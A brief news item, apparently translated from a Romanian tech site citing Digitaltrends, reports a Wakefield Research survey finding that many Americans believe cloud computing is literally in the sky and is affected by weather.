This is not a joke, it is the result of a study. Many Americans actually believe that cloud technology is somewhere in the sky. The study, conducted by Wakefield Research, reveals that 51% of Americans are sure that storms and rain directly interfere with cloud services, which respondents "locate" somewhere ...in the sky. Moreover, 29% of the study participants believe that the functioning of cloud computing (especially uploading and downloading) depends directly on weather conditions. Only 16% of those surveyed answered that the term cloud computing refers to a network of computers that store data.
Source: Digitaltrends
Via: Americanii stiu sigur: Cloud Computingul este in ...cer | Hit.ro